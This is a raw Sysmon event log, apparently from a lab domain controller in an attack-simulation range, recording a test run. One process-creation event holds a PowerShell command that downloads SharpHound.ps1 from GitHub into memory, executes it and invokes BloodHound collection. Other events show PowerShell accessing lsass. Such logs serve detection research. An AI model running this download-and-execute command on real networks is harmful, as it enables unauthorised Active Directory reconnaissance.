Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2AA2C9E1C41A3BF3EBCB6C662526BA1,SHA256=6CC4530A883AC6D48AC60BFFA2EE4AA8153734D5C31BF4E63E8718D609DCA035,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203242Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:48.268{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E3E9B7D79D14CD9F69B20F579084E175,SHA256=27A5DD53C2519D12B644963FF6F60C88FBEABCCC8CFAC053A5FCB8C6488F7DB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203241Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:48.190{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F0D9DD9E33AE9A77407255C8925C3CA,SHA256=19A8F84B23464BF2AA1293485D09BEA5C8D64284EA2E2BC19F2F38D3F3A06416,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203246Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:49.909{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA655BA9AC1F707EE6EF5162264D40F4,SHA256=CDD8295EE4324B6AD4E4655E5EBB461918A4A7440E30325A47C5620406CEDBAF,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000002203245Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:45.449{00000000-0000-0000-0000-000000000000}6232raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.108.133;::ffff:185.199.111.133;<unknown process> 354300x80000000000000002203244Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:45.026{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60700-false10.0.1.12-8000- 23542300x80000000000000002203248Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:50.955{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A31866696A3E8E08A3121B8410EAFD4E,SHA256=DDB32EB290922A34C1B324CBF1DB3FF47882BA9490050AD2EF2F0B5DE6762773,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203247Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:45.445{00000000-0000-0000-0000-000000000000}6232<unknown process>-tcptruefalse10.0.1.14win-dc-228.attackrange.local60701-false185.199.109.133cdn-185-199-109-133.github.com443https 23542300x80000000000000002203249Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:51.955{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C8E0F707125D4CFE5B23FB092CAFF13,SHA256=641E9FB00BC046DD39615768A51CF4225054D33ECCF79C66E13178A614DF337F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203250Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:52.971{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=745475264FC4F08B69CB12A9B9C7C6EF,SHA256=778F64CBC487D3D4D3988B0DC83C15A9EF4747DE18885D8F9510730567D156F4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203276Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:50.042{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60702-false10.0.1.12-8000- 10341000x80000000000000002203275Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.315{5ABCFE62-842F-603E-0F00-00000000AD01}2961448C:\Windows\system32\svchost.exe{5ABCFE62-E9B9-6040-464E-00000000AD01}4448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203274Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.315{5ABCFE62-842F-603E-0F00-00000000AD01}2961296C:\Windows\system32\svchost.exe{5ABCFE62-E9B9-6040-464E-00000000AD01}4448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002203273Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.299{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A70761604E8A25C876CC45D98545BBA,SHA256=AE52780284EA3CE59813F8871EAE0895AF93D880562956E02082854DC9BF4719,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203272Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.299{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3D3512FC21C4866794EC6921FF0F1A9C,SHA256=3594ACFCDB6E0E175FF7D6B836BED88CBAB49119AA1BD4D28238BAAB531734E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203271Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.284{5ABCFE62-842D-603E-0B00-00000000AD01}6325384C:\Windows\system32\lsass.exe{5ABCFE62-E9B9-6040-464E-00000000AD01}4448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203270Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.284{5ABCFE62-842D-603E-0B00-00000000AD01}6325384C:\Windows\system32\lsass.exe{5ABCFE62-E9B9-6040-464E-00000000AD01}4448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002203269Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-CreatePipe2021-03-04 14:07:53.268{5ABCFE62-E9B9-6040-464E-00000000AD01}4448\PSHost.132593404732092911.4448.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002203268Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.252{5ABCFE62-E9B9-6040-464E-00000000AD01}4448ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_sc2qainh.tdl.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203267Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.252{5ABCFE62-E9B9-6040-464E-00000000AD01}4448ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_3vhzkmwx.r1x.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002203266Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.237{5ABCFE62-E9B9-6040-464E-00000000AD01}4448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_3vhzkmwx.r1x.ps12021-03-04 14:07:53.237 10341000x80000000000000002203265Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.237{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-E9B9-6040-464E-00000000AD01}4448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203264Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.205{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9B9-6040-464E-00000000AD01}4448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203263Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.205{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9B9-6040-464E-00000000AD01}4448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF8172E9FF3) 10341000x80000000000000002203262Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.205{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203261Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.205{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203260Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.205{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203259Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.205{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203258Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.205{5ABCFE62-99F1-603E-7907-00000000AD01}30803060C:\Windows\system32\csrss.exe{5ABCFE62-E9B9-6040-464E-00000000AD01}4448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203257Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.205{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9B9-6040-464E-00000000AD01}4448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c675de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5ec19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c621471(wow64) 154100x80000000000000002203256Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.209{5ABCFE62-E9B9-6040-464E-00000000AD01}4448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {write-host \""Remote download of SharpHound.ps1 into memory, followed by execution of the script\"" -ForegroundColor Cyan IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1'); Invoke-BloodHound -OutputDirectory $env:Temp Start-Sleep 5} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002203255Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.205{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-04 14:07:47.393 11241100x80000000000000002203254Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.205{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-04 14:07:47.393 23542300x80000000000000002203253Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.190{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-err.txtMD5=7D454EE6242CE1E582CB393852104CF3,SHA256=D9E9EAEAB30B0E1D482AD5EB65F90A6BA0F83AC70FBF354976FCDF661B07A4BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203252Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.159{5ABCFE62-D502-6040-CD4B-00000000AD01}6732ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=3857640AB8C6D106BA278B5267D3E409,SHA256=4ADF202E7A51B5CFC70BBBBB45FF4FDE2F919D7DA89F9A381817FD682671454F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203251Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:53.127{5ABCFE62-E9B3-6040-454E-00000000AD01}5468ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203279Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:54.440{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A70761604E8A25C876CC45D98545BBA,SHA256=AE52780284EA3CE59813F8871EAE0895AF93D880562956E02082854DC9BF4719,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203278Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:54.190{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DAB42E03BDDD2DC269A21E56D67D3E17,SHA256=BCAF19735DA2667CE77A842D282D074878FA52FB55816A763E5FD27FBFC6061B,IMPHASH=00000000000000000000000000000000falsetrue 